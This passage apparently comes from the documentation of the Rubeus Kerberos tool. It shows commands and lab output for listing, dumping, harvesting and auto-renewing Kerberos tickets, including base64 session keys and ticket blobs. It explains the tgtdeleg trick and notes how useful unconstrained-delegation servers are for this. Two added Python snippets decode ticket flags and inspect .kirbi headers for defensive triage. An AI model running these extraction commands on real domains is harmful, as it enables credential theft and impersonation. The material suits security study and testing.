Ticket Extraction and Harvesting

Breakdown of the ticket extraction/harvesting commands:

The triage, klist, and dump commands give increasing amounts of ticket detail.

triage

The triage action will output a table of the current user's Kerberos tickets, if not elevated. If run from an elevated context, a table describing all Kerberos tickets on the system is displayed. Tickets can be filtered for a specific service with /service:SNAME.

If elevated, tickets can also be filtered for a specific LogonID with /luid:0xA.. or a specific user with /user:USER. This is useful when triaging systems with many Kerberos tickets.

Triage all enumerable tickets (non-elevated):

C:\Rubeus>Rubeus.exe triage

 ______        _
(_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/

v1.3.4



[*] Action: Triage Kerberos Tickets (Current User)

[*] Current LUID    : 0x4420e

-----------------------------------------------------------------------------------------
| LUID    | UserName                | Service                    | EndTime              |
-----------------------------------------------------------------------------------------
| 0x4420e | harmj0y @ TESTLAB.LOCAL | krbtgt/TESTLAB.LOCAL       | 2/12/2019 4:04:14 PM |
| 0x4420e | harmj0y @ TESTLAB.LOCAL | krbtgt/TESTLAB.LOCAL       | 2/12/2019 4:04:14 PM |
| 0x4420e | harmj0y @ TESTLAB.LOCAL | cifs/primary.testlab.local | 2/12/2019 4:04:14 PM |
-----------------------------------------------------------------------------------------

Triage all enumerable tickets (elevated):

C:\Rubeus>Rubeus.exe triage

 ______        _
(_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/

v1.3.4



[*] Action: Triage Kerberos Tickets (All Users)

-------------------------------------------------------------------------------------------------------------
| LUID      | UserName                   | Service                                  | EndTime               |
-------------------------------------------------------------------------------------------------------------
| 0x56cdda9 | harmj0y @ TESTLAB.LOCAL    | krbtgt/TESTLAB.LOCAL                     | 2/12/2019 4:04:14 PM  |
| 0x56cdda9 | harmj0y @ TESTLAB.LOCAL    | krbtgt/TESTLAB.LOCAL                     | 2/12/2019 4:04:14 PM  |
| 0x56cdda9 | harmj0y @ TESTLAB.LOCAL    | cifs/primary.testlab.local               | 2/12/2019 4:04:14 PM  |
| 0x56cdd86 | harmj0y @ TESTLAB.LOCAL    | krbtgt/TESTLAB.LOCAL                     | 2/12/2019 4:04:02 PM  |
| 0x47869cc | harmj0y @ TESTLAB.LOCAL    | krbtgt/TESTLAB.LOCAL                     | 2/12/2019 3:19:11 PM  |
| 0x47869cc | harmj0y @ TESTLAB.LOCAL    | krbtgt/TESTLAB.LOCAL                     | 2/12/2019 3:19:11 PM  |
| 0x47869cc | harmj0y @ TESTLAB.LOCAL    | cifs/primary.testlab.local               | 2/12/2019 3:19:11 PM  |
| 0x47869b4 | harmj0y @ TESTLAB.LOCAL    | krbtgt/TESTLAB.LOCAL                     | 2/12/2019 3:05:29 PM  |
| 0x3c4c241 | dfm.a @ TESTLAB.LOCAL      | krbtgt/TESTLAB.LOCAL                     | 2/11/2019 4:24:02 AM  |
| 0x441d8   | dfm.a @ TESTLAB.LOCAL      | cifs/primary.testlab.local               | 2/10/2019 11:41:26 PM |
| 0x441d8   | dfm.a @ TESTLAB.LOCAL      | LDAP/primary.testlab.local               | 2/10/2019 11:41:26 PM |
| 0x3e4     | windows10$ @ TESTLAB.LOCAL | krbtgt/TESTLAB.LOCAL                     | 2/12/2019 1:25:01 PM  |
| 0x3e4     | windows10$ @ TESTLAB.LOCAL | krbtgt/TESTLAB.LOCAL                     | 2/12/2019 1:25:01 PM  |
| 0x3e4     | windows10$ @ TESTLAB.LOCAL | cifs/PRIMARY.testlab.local               | 2/12/2019 1:25:01 PM  |
| 0x3e4     | windows10$ @ TESTLAB.LOCAL | ldap/primary.testlab.local/testlab.local | 2/11/2019 7:23:48 PM  |
| 0x3e7     | windows10$ @ TESTLAB.LOCAL | krbtgt/TESTLAB.LOCAL                     | 2/12/2019 2:23:45 PM  |
| 0x3e7     | windows10$ @ TESTLAB.LOCAL | krbtgt/TESTLAB.LOCAL                     | 2/12/2019 2:23:45 PM  |
| 0x3e7     | windows10$ @ TESTLAB.LOCAL | cifs/PRIMARY.testlab.local/testlab.local | 2/12/2019 2:23:45 PM  |
| 0x3e7     | windows10$ @ TESTLAB.LOCAL | WINDOWS10$                               | 2/12/2019 2:23:45 PM  |
| 0x3e7     | windows10$ @ TESTLAB.LOCAL | LDAP/PRIMARY.testlab.local/testlab.local | 2/12/2019 2:23:45 PM  |
-------------------------------------------------------------------------------------------------------------

Triage targeting a specific service (elevated):

C:\Rubeus>Rubeus.exe triage /service:ldap

 ______        _
(_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/

v1.3.4



[*] Action: Triage Kerberos Tickets (All Users)

[*] Target service  : ldap

-----------------------------------------------------------------------------------------------------------
| LUID    | UserName                   | Service                                  | EndTime               |
-----------------------------------------------------------------------------------------------------------
| 0x441d8 | dfm.a @ TESTLAB.LOCAL      | LDAP/primary.testlab.local               | 2/10/2019 11:41:26 PM |
| 0x3e4   | windows10$ @ TESTLAB.LOCAL | ldap/primary.testlab.local/testlab.local | 2/11/2019 7:23:48 PM  |
| 0x3e7   | windows10$ @ TESTLAB.LOCAL | LDAP/PRIMARY.testlab.local/testlab.local | 2/12/2019 2:23:45 PM  |
-----------------------------------------------------------------------------------------------------------

klist

The klist action lists detailed information on the current user's logon session and Kerberos tickets, if not elevated. If run from an elevated context, information on all logon sessions and their associated Kerberos tickets is displayed. Logon and ticket information can be displayed for a specific LogonID with /luid:0xA.. (if elevated).

Listing the current (non-elevated) user's logon session and Kerberos ticket information:

C:\Rubeus>Rubeus.exe klist

 ______        _
(_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/

v1.3.4



[*] Action: List Kerberos Tickets (Current User)

[*] Current LUID    : 0x4420e

    [0] - 0x12 - aes256_cts_hmac_sha1
    Start/End/MaxRenew: 2/12/2019 11:04:14 AM ; 2/12/2019 4:04:14 PM ; 2/19/2019 11:04:14 AM
    Server Name       : krbtgt/TESTLAB.LOCAL @ TESTLAB.LOCAL
    Client Name       : harmj0y @ TESTLAB.LOCAL
    Flags             : name_canonicalize, pre_authent, renewable, forwarded, forwardable (60a10000)

    ...(snip)...

Elevated listing of another user's logon session/Kerberos ticket information:

C:\Rubeus>Rubeus.exe klist /luid:0x47869b4

 ______        _
(_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/

v1.3.3



[*] Action: List Kerberos Tickets (All Users)

[*] Target LUID     : 0x47869b4

UserName                 : harmj0y
Domain                   : TESTLAB
LogonId                  : 0x47869b4
UserSID                  : S-1-5-21-883232822-274137685-4173207997-1111
AuthenticationPackage    : Kerberos
LogonType                : Interactive
LogonTime                : 2/11/2019 11:05:31 PM
LogonServer              : PRIMARY
LogonServerDNSDomain     : TESTLAB.LOCAL
UserPrincipalName        : harmj0y@testlab.local

    [0] - 0x12 - aes256_cts_hmac_sha1
    Start/End/MaxRenew: 2/11/2019 3:05:31 PM ; 2/11/2019 8:05:31 PM ; 2/18/2019 3:05:31 PM
    Server Name       : krbtgt/TESTLAB.LOCAL @ TESTLAB.LOCAL
    Client Name       : harmj0y @ TESTLAB.LOCAL
    Flags             : name_canonicalize, pre_authent, initial, renewable, forwardable (40e10000)

    ...(snip)...
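The Flags line in the klist output above names the set bits and gives the raw 32-bit TicketFlags value in parentheses. The following Python is an added example for this page, not Rubeus code: it decodes that value using the RFC 4120 bit positions in the same ascending order klist prints, parses a Flags line to cross-check the names against the hex, and distinguishes a TGT the user obtained by authenticating on this host (initial) from one that was delegated to it from elsewhere (forwarded without initial). That distinction is what a defender reviewing a server's logon sessions wants to know, since forwarded TGTs of privileged users sitting on a member server are exactly the exposure unconstrained delegation creates. The two sample values are the ones shown in the output above.

```python
# Kerberos TicketFlags as a 32-bit value, bit 0 being the most significant bit
# (RFC 4120 section 5.3). These are the values the Windows Kerberos SSP reports
# in KERB_TICKET_CACHE_INFO and that klist prints in hex after the flag names.
# Bit 15 is reported as name_canonicalize by the Windows enumeration.
TICKET_FLAGS = {
    0x40000000: "forwardable",
    0x20000000: "forwarded",
    0x10000000: "proxiable",
    0x08000000: "proxy",
    0x04000000: "may_postdate",
    0x02000000: "postdated",
    0x01000000: "invalid",
    0x00800000: "renewable",
    0x00400000: "initial",
    0x00200000: "pre_authent",
    0x00100000: "hw_authent",
    0x00080000: "transited_policy_checked",
    0x00040000: "ok_as_delegate",
    0x00010000: "name_canonicalize",
}


def decode_ticket_flags(value):
    """Return the flag names set in `value`, lowest bit value first (the order klist uses)."""
    names = [name for bit, name in sorted(TICKET_FLAGS.items()) if value & bit]
    known = sum(TICKET_FLAGS)
    leftover = value & ~known & 0xFFFFFFFF
    if leftover:
        # Bits we have no name for (e.g. the reserved MSB) are reported rather than dropped.
        names.append(f"unknown(0x{leftover:08x})")
    return names


def parse_flags_line(line):
    """Parse a klist 'Flags : a, b, c (hex)' line into (names, integer value)."""
    _, _, rest = line.partition(":")
    names_part, _, hex_part = rest.rpartition("(")
    names = [n.strip() for n in names_part.split(",") if n.strip()]
    value = int(hex_part.strip().rstrip(")"), 16)
    return names, value


def flags_line_is_consistent(line):
    """True when the names printed on a Flags line match the hex value beside them."""
    names, value = parse_flags_line(line)
    return names == decode_ticket_flags(value)


def classify_tgt(value):
    """Say how a TGT with these flags came to be in the logon session."""
    if value & 0x00400000:      # initial: issued by the AS exchange, the user authenticated here
        return "initial"
    if value & 0x20000000:      # forwarded: a delegated copy of a TGT from another host
        return "forwarded"
    return "other"              # obtained through the TGS without either marker


if __name__ == "__main__":
    # Sample lines copied from the klist output above.
    for line in (
        "    Flags             : name_canonicalize, pre_authent, renewable, forwarded, forwardable (60a10000)",
        "    Flags             : name_canonicalize, pre_authent, initial, renewable, forwardable (40e10000)",
    ):
        names, value = parse_flags_line(line)
        print(f"0x{value:08x}: {', '.join(decode_ticket_flags(value))} -> {classify_tgt(value)}",
              "(consistent)" if flags_line_is_consistent(line) else "(MISMATCH)")
```

Reading the two sample lines this way shows the current user's TGT in the non-elevated klist run is a forwarded copy, while the one in LUID 0x47869b4 is the initial TGT from that user's interactive logon.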

dump

The dump action extracts current TGTs and service tickets if run in an elevated context. If not elevated, only the current user's service tickets are extracted. The extracted tickets can be filtered by /service (use /service:krbtgt for TGTs) and/or by logon ID (the /luid:0xA.. parameter). The KRB-CRED files (.kirbis) are output as base64 blobs and can be reused with the ptt action, or with Mimikatz's kerberos::ptt functionality.

Note: if run from a non-elevated context, the session keys for TGTs are not returned (by default) by the associated APIs, so only the extracted service tickets will be usable. To (somewhat) work around this, use the tgtdeleg command.

Extracting the current user's usable service tickets:

C:\Rubeus>Rubeus.exe dump

 ______        _
(_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/

v1.3.4



[*] Action: Dump Kerberos Ticket Data (Current User)

[*] Current LUID    : 0x4420e

[*] Returned 3 tickets

ServiceName              : krbtgt/TESTLAB.LOCAL
TargetName               : krbtgt/TESTLAB.LOCAL
ClientName               : harmj0y
DomainName               : TESTLAB.LOCAL
TargetDomainName         : TESTLAB.LOCAL
AltTargetDomainName      : TESTLAB.LOCAL
SessionKeyType           : rc4_hmac
Base64SessionKey         : AAAAAAAAAAAAAAAAAAAAAA==
KeyExpirationTime        : 12/31/1600 4:00:00 PM
TicketFlags              : name_canonicalize, pre_authent, renewable, forwarded, forwardable
StartTime                : 2/11/2019 3:19:15 PM
EndTime                  : 2/11/2019 8:19:13 PM
RenewUntil               : 2/18/2019 3:19:13 PM
TimeSkew                 : 0
EncodedTicketSize        : 1306
Base64EncodedTicket      :

    doIFFjCCBRKgAwIBBaEDAgEWoo...(snip)...

...(snip)...



[*] Enumerated 3 total tickets
[*] Extracted  3 total tickets
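Each ticket in the dump output above carries an EncodedTicketSize and a base64 blob that is a DER-encoded KRB-CRED, and the non-elevated run shows the withheld TGT session key as AAAAAAAAAAAAAAAAAAAAAA== (16 zero bytes). The Python below is an added example written for this page, not Rubeus code: it reads the DER header of such a blob, confirms it is a KRB-CRED and recovers the total encoded size from the length field, and checks a Base64SessionKey for the all-zero value. An analyst can use it to recognise .kirbi material found in logs or registry values without needing the full blob, and to tell whether a dumped TGT was actually usable. The blob prefixes in the demonstration are copied from the output above, truncated where the page truncates them.

```python
import base64

# Kerberos message types (RFC 4120 section 7.5.7). A .kirbi is a DER-encoded
# KRB-CRED, so its outer APPLICATION tag and its msg-type field are both 22.
KRB_MSG_TYPES = {
    10: "AS-REQ", 11: "AS-REP", 12: "TGS-REQ", 13: "TGS-REP",
    14: "AP-REQ", 15: "AP-REP", 22: "KRB-CRED", 30: "KRB-ERROR",
}


def _read_tlv(buf, pos):
    """Read one DER tag and length at buf[pos].

    Returns (tag_class, constructed, tag_number, length, content_offset), where
    tag_class is 0 UNIVERSAL, 1 APPLICATION, 2 CONTEXT-SPECIFIC, 3 PRIVATE.
    """
    first = buf[pos]
    tag_class = first >> 6
    constructed = bool(first & 0x20)
    tag_number = first & 0x1F
    if tag_number == 0x1F:
        raise ValueError("high-tag-number form is not used in Kerberos DER")
    length = buf[pos + 1]
    pos += 2
    if length & 0x80:                       # long form: low 7 bits give the count of length bytes
        nbytes = length & 0x7F
        if nbytes == 0 or nbytes > 4:
            raise ValueError("unsupported DER length encoding")
        length = int.from_bytes(buf[pos:pos + nbytes], "big")
        pos += nbytes
    return tag_class, constructed, tag_number, length, pos


def _read_tagged_int(buf, pos, ctx_tag):
    """Read the [ctx_tag] { INTEGER } pattern Kerberos uses for pvno and msg-type."""
    cls, cons, tag, _, pos = _read_tlv(buf, pos)
    if cls != 2 or not cons or tag != ctx_tag:
        raise ValueError(f"expected context-specific tag [{ctx_tag}]")
    cls, cons, tag, length, pos = _read_tlv(buf, pos)
    if cls != 0 or cons or tag != 0x02:
        raise ValueError("expected INTEGER")
    return int.from_bytes(buf[pos:pos + length], "big", signed=True), pos + length


def inspect_kirbi_header(b64_blob):
    """Identify a base64 Kerberos blob from its DER header alone.

    Only the first ~20 bytes are examined, so a truncated blob copied from tool
    output, a log or a registry value is enough. Returns the protocol version,
    the message type and the full encoded size announced by the outer length.
    """
    b64 = "".join(b64_blob.split())
    b64 += "=" * (-len(b64) % 4)            # re-pad a truncated blob so it decodes
    raw = base64.b64decode(b64)

    cls, cons, app_tag, length, pos = _read_tlv(raw, 0)
    if cls != 1 or not cons:
        raise ValueError("not an APPLICATION-tagged Kerberos message")
    encoded_size = pos + length             # tag byte + length bytes + content

    cls, cons, tag, _, pos = _read_tlv(raw, pos)   # SEQUENCE holding the fields
    if cls != 0 or not cons or tag != 0x10:
        raise ValueError("expected SEQUENCE")
    pvno, pos = _read_tagged_int(raw, pos, 0)
    msg_type, _ = _read_tagged_int(raw, pos, 1)
    if msg_type != app_tag:
        raise ValueError("msg-type does not match the APPLICATION tag")

    return {
        "pvno": pvno,
        "msg_type": msg_type,
        "msg_type_name": KRB_MSG_TYPES.get(msg_type, "unknown"),
        "encoded_size": encoded_size,
        "is_kirbi": msg_type == 22,
    }


def session_key_is_usable(b64_session_key):
    """False for the all-zero key the LSA returns when it withholds a TGT session key."""
    key = base64.b64decode(b64_session_key)
    return len(key) > 0 and any(key)


if __name__ == "__main__":
    # Prefixes copied from the dump output above, paired with the EncodedTicketSize printed beside them.
    for prefix, reported in (("doIFFjCCBRKgAwIBBaEDAgEWoo", 1306), ("doIFNjCCBTKgAwIBBaEDAgEWoo", 1338)):
        info = inspect_kirbi_header(prefix)
        print(f"{info['msg_type_name']} pvno={info['pvno']} size={info['encoded_size']} "
              f"(tool reported {reported})")
    for key in ("AAAAAAAAAAAAAAAAAAAAAA==", "u9DOCzuGKAZB6h/E/9XcFg=="):
        print(key, "usable" if session_key_is_usable(key) else "withheld (all zero)")
```

The size recovered from the DER length field matches the EncodedTicketSize Rubeus prints for each ticket, which is a quick way to confirm that a blob recovered from an artifact is complete.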

Elevated extraction of tickets from a specific logon session:

C:\Rubeus>Rubeus.exe dump /luid:0x47869cc

 ______        _
(_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/

v1.3.3



[*] Action: Dump Kerberos Ticket Data (All Users)

[*] Target LUID: 0x47869cc

UserName                 : harmj0y
Domain                   : TESTLAB
LogonId                  : 0x47869cc
UserSID                  : S-1-5-21-883232822-274137685-4173207997-1111
AuthenticationPackage    : Negotiate
LogonType                : Interactive
LogonTime                : 2/11/2019 11:05:31 PM
LogonServer              : PRIMARY
LogonServerDNSDomain     : TESTLAB.LOCAL
UserPrincipalName        : harmj0y@testlab.local

    [*] Enumerated 3 ticket(s):

    ServiceName              : krbtgt/TESTLAB.LOCAL
    TargetName               : krbtgt/TESTLAB.LOCAL
    ClientName               : harmj0y
    DomainName               : TESTLAB.LOCAL
    TargetDomainName         : TESTLAB.LOCAL
    AltTargetDomainName      : TESTLAB.LOCAL
    SessionKeyType           : rc4_hmac
    Base64SessionKey         : u9DOCzuGKAZB6h/E/9XcFg==
    KeyExpirationTime        : 12/31/1600 4:00:00 PM
    TicketFlags              : name_canonicalize, pre_authent, renewable, forwarded, forwardable
    StartTime                : 2/11/2019 3:21:53 PM
    EndTime                  : 2/11/2019 8:19:13 PM
    RenewUntil               : 2/18/2019 3:19:13 PM
    TimeSkew                 : 0
    EncodedTicketSize        : 1306
    Base64EncodedTicket      :

    doIFFjCCBRKgAwIBBaEDAgEWoo...(snip)...

    ServiceName              : krbtgt/TESTLAB.LOCAL
    TargetName               : krbtgt/TESTLAB.LOCAL
    ClientName               : harmj0y
    DomainName               : TESTLAB.LOCAL
    TargetDomainName         : TESTLAB.LOCAL
    AltTargetDomainName      : TESTLAB.LOCAL
    SessionKeyType           : aes256_cts_hmac_sha1
    Base64SessionKey         : tKcszT8rdYyxBxBHlkpmJ/SEsfON8mBMs4ZN/29Xv8A=
    KeyExpirationTime        : 12/31/1600 4:00:00 PM
    TicketFlags              : name_canonicalize, pre_authent, initial, renewable, forwardable
    StartTime                : 2/11/2019 3:19:13 PM
    EndTime                  : 2/11/2019 8:19:13 PM
    RenewUntil               : 2/18/2019 3:19:13 PM
    TimeSkew                 : 0
    EncodedTicketSize        : 1338
    Base64EncodedTicket      :

    doIFNjCCBTKgAwIBBaEDAgEWoo...(snip)...

    ...(snip)...


[*] Enumerated 3 total tickets
[*] Extracted  3 total tickets

Elevated extraction of all TGTs on a system:

C:\Rubeus>Rubeus.exe dump /service:krbtgt

 ______        _                      
(_____ \      | |                     
 _____) )_   _| |__  _____ _   _  ___ 
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/

v1.3.3



[*] Action: Dump Kerberos Ticket Data (All Users)

[*] Target service  : krbtgt


UserName                 : harmj0y
Domain                   : TESTLAB
LogonId                  : 0x47869cc
UserSID                  : S-1-5-21-883232822-274137685-4173207997-1111
AuthenticationPackage    : Negotiate
LogonType                : Interactive
LogonTime                : 2/11/2019 11:05:31 PM
LogonServer              : PRIMARY
LogonServerDNSDomain     : TESTLAB.LOCAL
UserPrincipalName        : harmj0y@testlab.local

    [*] Enumerated 3 ticket(s):

    ServiceName              : krbtgt/TESTLAB.LOCAL
    TargetName               : krbtgt/TESTLAB.LOCAL
    ClientName               : harmj0y
    DomainName               : TESTLAB.LOCAL
    TargetDomainName         : TESTLAB.LOCAL
    AltTargetDomainName      : TESTLAB.LOCAL
    SessionKeyType           : rc4_hmac
    Base64SessionKey         : y4LL+W3KZoOjnwsiwf150g==
    KeyExpirationTime        : 12/31/1600 4:00:00 PM
    TicketFlags              : name_canonicalize, pre_authent, renewable, forwarded, forwardable
    StartTime                : 2/11/2019 3:23:50 PM
    EndTime                  : 2/11/2019 8:19:13 PM
    RenewUntil               : 2/18/2019 3:19:13 PM
    TimeSkew                 : 0
    EncodedTicketSize        : 1306
    Base64EncodedTicket      :

    doIFFjCCBRKgAwIBBaEDAgEWoo...(snip)...

    ...(snip)...

UserName                 : WINDOWS10$
Domain                   : TESTLAB
LogonId                  : 0x3e4
UserSID                  : S-1-5-20
AuthenticationPackage    : Negotiate
LogonType                : Service
LogonTime                : 2/7/2019 4:51:20 PM
LogonServer              : 
LogonServerDNSDomain     : testlab.local
UserPrincipalName        : WINDOWS10$@testlab.local

    [*] Enumerated 4 ticket(s):

    ServiceName              : krbtgt/TESTLAB.LOCAL
    TargetName               : krbtgt/TESTLAB.LOCAL
    ClientName               : WINDOWS10$
    DomainName               : TESTLAB.LOCAL
    TargetDomainName         : TESTLAB.LOCAL
    AltTargetDomainName      : TESTLAB.LOCAL
    SessionKeyType           : rc4_hmac
    Base64SessionKey         : 0NgsSyZ/XOCTi9wLR1z9Kg==
    KeyExpirationTime        : 12/31/1600 4:00:00 PM
    TicketFlags              : name_canonicalize, pre_authent, renewable, forwarded, forwardable
    StartTime                : 2/11/2019 3:23:50 PM
    EndTime                  : 2/11/2019 7:23:48 PM
    RenewUntil               : 2/18/2019 2:23:48 PM
    TimeSkew                 : 0
    EncodedTicketSize        : 1304
    Base64EncodedTicket      :

    doIFFDCCBRCgAwIBBaEDAgEWoo...(snip)...

    ...(snip)...


[*] Enumerated 20 total tickets
[*] Extracted  9 total tickets

tgtdeleg

The tgtdeleg action uses @gentilkiwi's Kekeo trick (tgt::deleg), which abuses the Kerberos GSS-API to retrieve a usable TGT for the current user without needing elevation on the host. AcquireCredentialsHandle() is used to get a handle to the current user's Kerberos security credentials, and InitializeSecurityContext() is called with the ISC_REQ_DELEGATE flag and a target SPN of HOST/DC.domain.com to prepare a fake delegate context to send to the DC. This results in an AP-REQ in the GSS-API output that contains a KRB_CRED in the authenticator checksum. The service ticket session key is extracted from the local Kerberos cache and is used to decrypt the KRB_CRED in the authenticator, resulting in a usable TGT .kirbi.

If automatic target/domain extraction fails, a known SPN of a service configured with unconstrained delegation can be specified with /target:SPN.

C:\Rubeus>Rubeus.exe tgtdeleg

 ______        _
(_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/

v1.3.3


[*] Action: Request Fake Delegation TGT (current user)

[*] No target SPN specified, attempting to build 'HOST/dc.domain.com'
[*] Initializing Kerberos GSS-API w/ fake delegation for target 'HOST/PRIMARY.testlab.local'
[+] Kerberos GSS-API initialization success!
[+] Delegation requset success! AP-REQ delegation ticket is now in GSS-API output.
[*] Found the AP-REQ delegation ticket in the GSS-API output.
[*] Authenticator etype: aes256_cts_hmac_sha1
[*] Extracted the service ticket session key from the ticket cache: YnEFxPfqw3LdfNvLtdFfzaFf7zG3hG+HNjesy+6R+ys=
[+] Successfully decrypted the authenticator
[*] base64(ticket.kirbi):

    doIFNjCCBTKgAwIBBaEDAgEWoo...(snip)...

monitor

The monitor action will periodically extract all TGTs every /monitorinterval:X seconds (default of 60) and display any newly captured TGTs. A /targetuser:USER can be specified to return only ticket data for that user. This function is especially useful on servers with unconstrained delegation enabled ;)

When the /targetuser:USER (or, if not specified, any user) creates a new 4624 logon event, any extracted TGT KRB-CRED data is output.

The /nowrap flag causes the base64 encoded ticket output not to be wrapped per line.

If you want monitor to run for a specific period of time, use /runfor:SECONDS.

Further, if you wish to save the output to the registry, pass the /registry flag and specify a path under HKLM to create (e.g., /registry:SOFTWARE\MONITOR). You can remove this entry after you've finished running Rubeus with Get-Item HKLM:\SOFTWARE\MONITOR\ | Remove-Item -Recurse -Force.

c:\Rubeus>Rubeus.exe monitor /targetuser:DC$ /interval:10

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v1.5.0

[*] Action: TGT Monitoring
[*] Target user     : DC$
[*] Monitoring every 10 seconds for new TGTs


[*] 12/21/2019 11:10:16 PM UTC - Found new TGT:

  User                  :  DC$@THESHIRE.LOCAL
  StartTime             :  12/21/2019 2:44:31 PM
  EndTime               :  12/21/2019 3:44:31 PM
  RenewTill             :  12/28/2019 2:13:06 PM
  Flags                 :  name_canonicalize, pre_authent, renewable, forwarded, forwardable
  Base64EncodedTicket   :

    doIFFDCCBRCgAwIBBaEDAgEWoo...(snip)...

[*] Ticket cache size: 1

Note that this action needs to be run from an elevated context!

harvest

The harvest action takes monitor one step further. It periodically extracts all TGTs every /monitorinterval:X seconds (default of 60), extracts any new TGT KRB-CRED files, and keeps a cache of the extracted TGTs. Every interval, any TGTs that will expire before the next interval are automatically renewed (up until their renewal limit). Every /displayinterval:X seconds (default of 1200), the current cache of "usable"/valid TGT KRB-CRED .kirbis is output as base64 blobs.

This allows you to harvest usable TGTs from a system without opening a read handle to LSASS, though elevated rights are needed to extract the tickets.

The /nowrap flag causes the base64 encoded ticket output not to be wrapped per line.

If you want harvest to run for a specific period of time, use /runfor:SECONDS.

Further, if you wish to save the output to the registry, pass the /registry flag and specify a path under HKLM to create (e.g., /registry:SOFTWARE\MONITOR). You can remove this entry after you've finished running Rubeus with Get-Item HKLM:\SOFTWARE\MONITOR\ | Remove-Item -Recurse -Force.

c:\Rubeus>Rubeus.exe harvest /interval:30

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v0.0.1a

[*] Action: TGT Harvesting (w/ auto-renewal)

[*] Monitoring every 30 minutes for 4624 logon events

...(snip)...

[*] Renewing TGT for dfm.a@TESTLAB.LOCAL
[*] Connecting to 192.168.52.100:88
[*] Sent 1520 bytes
[*] Received 1549 bytes

[*] 9/17/2018 6:43:02 AM - Current usable TGTs:

User                  :  dfm.a@TESTLAB.LOCAL
StartTime             :  9/17/2018 6:43:02 AM
EndTime               :  9/17/2018 11:43:02 AM
RenewTill             :  9/24/2018 2:07:48 AM
Flags                 :  name_canonicalize, renewable, forwarded, forwardable
Base64EncodedTicket   :

    doIFujCCBbagAw...(snip)...

Note that this action needs to be run from an elevated context!
